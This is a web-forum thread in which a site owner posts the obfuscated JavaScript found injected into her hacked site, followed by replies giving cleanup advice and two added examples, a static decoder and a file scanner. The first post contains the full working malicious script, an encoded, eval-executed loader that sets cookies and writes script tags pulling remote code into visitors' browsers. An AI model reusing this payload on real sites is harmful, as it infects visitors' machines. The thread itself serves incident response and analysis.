my site been hacked - Interpret Javascript code

#1 jessicakoh, 03-19-10, 11:34 PM

My sites have been hacked.

Code:
echo <script language="javascript">function t(){return z($a);}var $a="Z64zZ3dZ22Z2566unZ2563tiZ256fn Z2564w(tZ2529Z257bcaZ253dZ2527Z252564ocuZ25256deZ256etZ25252Z2565wrZ25256Z2539Z2574Z2565Z25252Z2538Z252522Z2527;cZ2565Z253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253cscZ252572ipZ252574 laZ25256egZ252575aZ2567eZ25253dZ2525Z2535cZ252522jaZ2576Z2561Z2573crZ25256Z2539ptZ25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ2525Z2535cZ25252fscZ2525Z25372Z2569pZ252574Z25253eZ2527;evZ2561Z256c(unZ2565scZ2561pZ2565(t)Z2529};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cbZ3dZ22dZ2573);sZ2574Z253dtmpZ253dZ2527Z2527;foZ2572Z2528iZ253d0;iZ253cdsZ252elZ2565Z256eZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;czZ3dZ22Z2566uncZ2574ionZ2520Z2563Z257aZ2528czZ2529Z257bretuZ2572n Z2563a+Z2563Z2562+cZ2563+Z2563d+cZ2565+czZ253bZ257d;Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ22gtZ2568;i+Z252b)Z257btmpZ253ddsZ252eslZ2569ce(Z2569Z252ci+1Z2529;stZ253dZ2573Z25Z22;caZ3dZ22Z2566uZ256eZ2563tioZ256e 
Z2564csZ2528dZ2573,eZ2573)Z257bdsZ253duneZ2573capZ2565(Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;ceZ3dZ22Z2561rCoZ2564eAtZ25280)Z255e(Z25270Z25780Z2530Z2527+Z2565sZ2529)Z2529;Z257d}Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dsZ2574;Z2564cZ2573(Z2564Z2561+Z2564bZ252bZ2564cZ252bZ2564Z2564+Z2564Z2565,Z2531Z2530)Z253bZ2564Z2577(Z2573tZ2529Z253bZ2573Z2574Z253d$Z2561Z253bZ2522;Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cdZ3dZ2274+Z2553trZ2569ng.Z2566romZ2543haZ2572CZ256fdZ2565Z2528(Z2574mZ2570Z252eZ2563Z2568Z22;opZ3dZ22Z2524aZ253dZ2522dw(dZ2563s(cZ2575,1Z2534))Z253bZ2522;Z22;Z69f (Z64ocZ75mZ65nZ74Z2ecZ6fokZ69e.iZ6edeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)Z7bfunctiZ6fnZ20cZ61llbZ61ckZ28Z78)Z7bwinZ64ow.Z74w Z3dZ20x;vZ61rZ20Z64 Z3d 
Z6eewZ20DaZ74eZ28Z29;dZ2esetZ54imZ65(xZ5bZ22aZ73_ofZ22]Z2a10Z30Z30);vZ61Z72 Z68Z20Z3d Z64.Z67Z65Z74UTCZ48oZ75rZ73()Z3bwinZ64oZ77.h Z3dZ20h;iZ66Z20(h Z3e 8Z29Z7bd.sZ65tUZ54CDaZ74e(dZ2egZ65Z74UTZ43DatZ65()Z20- 2Z29;}eZ6cZ73eZ7bdZ2eseZ74UTZ43DaZ74e(dZ2egeZ74UTZ43DZ61tZ65Z28Z29 - Z33)Z3b}Z77Z69nZ64oZ77.gdZ20Z3d Z64Z3bvZ61r Z74iZ6dZ65 Z3d Z6eeZ77 ArZ72ay(Z29Z3bvarZ20shZ69Z66tZ49nZ64eZ78 Z3d Z22Z22;timZ65[Z22yeaZ72Z22] Z3d d.Z67etZ55TZ43FulZ6cYeaZ72Z28);Z74imZ65[Z22monZ74hZ22] Z3d d.Z67etZ55TCZ4doZ6eth(Z29+Z31Z3btiZ6dZ65[Z22daZ79Z22Z5dZ20Z3d d.gZ65Z74Z55TCZ44Z61te(Z29;iZ66 Z28Z64.geZ74UTZ43MoZ6etZ68(Z29Z2b1 Z3c 10Z29Z7bshifZ74InZ64exZ20Z3d tiZ6de[Z22yearZ22]Z20+ Z22-Z30Z22 +Z20(Z64.geZ74UTCZ4doZ6ethZ28Z29Z2bZ31);}Z65lseZ7bZ73Z68iZ66tZ49Z6edexZ20Z3dZ20tiZ6de[Z22yeaZ72Z22] +Z20Z22-Z22 + Z28dZ2egZ65tUTZ43MoZ6eZ74Z68(Z29Z2bZ31)Z3b}Z69f (Z64.gZ65Z74UTCZ44ateZ28Z29 Z3c 10Z29Z7bshifZ74Z49ndZ65x Z3dsZ68iftZ49Z6eZ64ex Z2b Z22-0Z22Z20+ dZ2eZ67etZ55Z54CZ44atZ65()Z3b}elZ73eZ7bshZ69Z66tIZ6edexZ20Z3d sZ68iftZ49ndeZ78 Z2bZ20Z22-Z22 + d.Z67etUZ54Z43Z44Z61te(Z29Z3b}doZ63Z75menZ74.wrZ69Z74e(Z22Z3cscZ72Z22+Z22Z69pt Z6cZ61nguZ61Z67eZ3djavaZ73crZ69ptZ22+Z22 sZ72cZ3dZ27htZ74pZ3aZ2fZ2fsearch.tZ77iZ74Z74Z65Z72.Z63omZ2ftZ72endZ73Z2fdZ61ilZ79.jsZ6fZ6e?Z64aZ74Z65Z3dZ22+ shiftIZ6eZ64eZ78+Z22&cZ61lZ6cbaZ63kZ3dcalZ6cbacZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22ipZ74Z3eZ22);} funcZ74ioZ6e cZ61llbZ61ckZ32(x)Z7bwinZ64ow.Z74wZ20Z3d x;scZ28Z27rf5fZ36dsZ27,Z32Z2c7);Z65Z76aZ6c(Z75Z6eesZ63Z61Z70e(dZ7aZ2bcZ7a+oZ70+stZ29Z2bZ27dw(Z64z+Z63z($Z61+stZ29);Z27)Z3bdZ6fcumZ65Z6et.wZ72itZ65($Z61Z29Z3b}dZ6fZ63Z75mZ65Z6et.Z77Z72iteZ28Z22Z3cimg srZ63Z3dZ27httpZ3aZ2fZ2fsZ65arcZ68.twZ69tZ74Z65rZ2ecZ6fZ6dZ2fimaZ67esZ2fZ73Z65aZ72chZ2frssZ2epngZ27Z20Z77iZ64tZ68Z3d1 hZ65Z69ghZ74Z3d1Z20stZ79leZ3dZ27visibZ69liZ74y:Z68iZ64Z64enZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cZ61nZ67uZ61Z67eZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearZ63h.tZ77iZ74Z74Z65r.cZ6fmZ2ftreZ6edsZ2fdaZ69ly.Z6asoZ6e?Z63alZ6cbZ61ckZ3dcZ61Z6clbZ61Z63kZ27Z3eZ22 + 
Z22Z3cZ2fscrZ22 + Z22ipZ74Z3eZ22);}eZ6cZ73eZ7b$aZ3dZ27Z27};funcZ74iZ6fn Z73c(Z63nm,Z76,eZ64)Z7bvar Z65xdZ3dnew Z44aZ74Z65(Z29;Z65xdZ2esetZ44aZ74Z65(Z65Z78dZ2eZ67Z65tDZ61Z74e()Z2bZ65d)Z3bZ64oZ63umZ65Z6et.Z63ookZ69eZ3dcnm+Z20Z27Z3dZ27 +escape(vZ29Z2bZ27;eZ78pirZ65sZ3dZ27+exdZ2eZ74Z6fZ47MTZ53Z74riZ6eg()Z3b};";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>'';
Can you tell me how to interpret this code? I want to find out the culprit.

I believe it's an insider's job in my web host.

Thank you.
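
Added example, not part of the original thread: the last statements of the posted snippet show how its outer layer is encoded (`z()` swaps every `Z` for `%` and calls `unescape()`), so that layer can be read without running anything. This sketch repeats the transform on three fragments copied from the post and reports URLs, script sinks and remaining nested escapes; the function names are illustrative.

```javascript
// Added example: static decode of the payload's outer layer. Nothing is eval()'d.
// Same semantics as legacy unescape(): %XX and %uXXXX; invalid escapes stay as-is.
function unescapeLayer(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Mirrors the page's z(): every "Z" becomes "%", then one unescape pass.
function decodeZ(s) {
  return unescapeLayer(s.split('Z').join('%'));
}

// Fragments copied verbatim from the payload in post #1 (not the whole script).
const SAMPLE = [
  "Z69f (Z64ocZ75mZ65nZ74Z2ecZ6fokZ69e.iZ6edeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)",
  "srcZ3dZ27http:Z2fZ2fsearZ63h.tZ77iZ74Z74Z65r.cZ6fmZ2ftreZ6edsZ2fdaZ69ly.Z6asoZ6e?Z63alZ6cbZ61ckZ3dcZ61Z6clbZ61Z63kZ27Z3e",
  "opZ3dZ22Z2524aZ253dZ2522dw(dZ2563s(cZ2575,1Z2534))Z253bZ2522;Z22;",
].join('\n');

// Summarise what an analyst looks for in the decoded layer.
function triage(encoded) {
  const layer1 = decodeZ(encoded);
  return {
    layer1,
    // Remote resources the script refers to.
    urls: layer1.match(/https?:\/\/[^\s'"<>]+/g) || [],
    // Calls that execute or inject code, or touch cookies.
    sinks: ['eval(', 'unescape(', 'document.write', 'document.cookie']
      .filter((k) => layer1.includes(k)),
    // %XX sequences still present: a sign of further encoded layers.
    nestedEscapes: (layer1.match(/%[0-9a-fA-F]{2}/g) || []).length,
  };
}

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

A non-zero `nestedEscapes` means parts of the script are encoded more than once; `unescapeLayer()` can be applied again to those strings, still without evaluating them.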

#2 wirehopper, 03-20-10, 09:15 AM
Don't try to interpret the code. You won't learn anything, and you may infect your PC with malware.

It's probably not an "insider's job". Your site got hacked, and it happens every day. A server is a resource and hackers use other people's servers for many malicious actions.

Here are some tips for cleaning up after your site/server has been hacked.

Look at the files that don’t belong - find a common pattern. Most have one.

Use grep -rl pattern * to find all the affected files. If you pipe the output to a file, you can turn it into a script that can automatically delete them. However - be careful to leave any files that are important. Those will have to be cleaned up manually.

If you run into permission issues, where the files were created by ‘nobody.nobody’ or ‘apache.apache’, you can use PHP’s system command to execute the rms - like so:

Code:

system('rm -f badfile.file');

Check your error logs and access logs, as well as your stats to find any additional files.

Avoid chmod 777 - although there are times when it is necessary. This is a hazard of administering a site through the web. An excellent alternative is to always chmod 755 after you edit those files, if possible. This won’t work for caches, template compilation directories, or file upload areas.

Don’t forget to escape the input, for both command lines and SQL statements, and validate on both the client and server side.

Be sure to identify how the hacker got in, whether it was an outdated application with security holes, SSH, your code, or some other failure. Resolve that issue.

Remember that there may be more than one symptom of the hack. My server was being used to distribute files, run a phishing scam (no page requests were processed when I found it), and links to other servers in hacked templates.

If you have a hosting company, it is good to contact them for help - especially if there is any sort of phishing or other financial scam involved.

Finally, sometimes it is better to delete a corrupted application, or reinstall it.
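
Added example, not part of the original thread: a Node.js equivalent of the `grep -rl` sweep for a local copy of the site (usable without SSH), which also flags world-writable files and directories. The three signature patterns are taken from the snippet posted in #1; `scanSite` and the two-hit threshold are assumptions of this example.

```javascript
// Added example: find files carrying the injected loader and anything left
// world-writable (chmod 777/666). Run it against a downloaded copy of the site.
const fs = require('fs');
const path = require('path');

// Markers taken from the script posted in #1.
const SIGNATURES = [
  /function z\(s\)\{r="";/,       // the Z-to-% decoder stub
  /eval\(t\(\)\)/,                // the call that runs the decoded script
  /var \$a="Z[0-9a-fA-F]{2}/,     // start of the encoded blob
];

function scanSite(root) {
  const report = { injected: [], worldWritable: [] };
  const walk = (dir) => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      if (entry.isSymbolicLink()) continue;          // stay inside the tree
      const st = fs.statSync(full);
      if (st.mode & 0o002) report.worldWritable.push(full);
      if (entry.isDirectory()) { walk(full); continue; }
      if (!entry.isFile() || st.size > 5 * 1024 * 1024) continue;
      const text = fs.readFileSync(full, 'latin1');  // byte-safe for any encoding
      const hits = SIGNATURES.filter((re) => re.test(text)).length;
      if (hits >= 2) report.injected.push(full);     // two markers to limit false positives
    }
  };
  walk(root);
  return report;
}

// Usage: node scan.js /path/to/site-copy
if (process.argv[2]) console.log(scanSite(process.argv[2]));
```

Files listed under `injected` still need manual review before deletion, since legitimate pages may have had the script appended to them.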

#3 jessicakoh, 03-22-10, 07:49 PM
I am on cloud shared hosting, so I don't have access to SSH.

I suspect it's an insiders' job.

By interpreting the code, hopefully I can find the culprit.

#4 wirehopper, 03-23-10, 06:55 AM
I can almost promise it isn't an insider's job, and you won't find the culprit.

However, you really need to clean it up, as fast as possible, because you are risking every computer that visits your site, and some search engines warn people if a site is serving up malware - which means your site may lose credibility if it is not cleaned up quickly.

Sites get hacked all the time; don't worry about it.

If you have a copy of the site on your PC, just upload a new copy. If you don't - then you'll need to check all the files and clean them up.

Your hosting company may be able to help you.

#5 consc198 (Cyprus), 03-23-10, 09:18 AM
Did you find this code in an existing page of your website?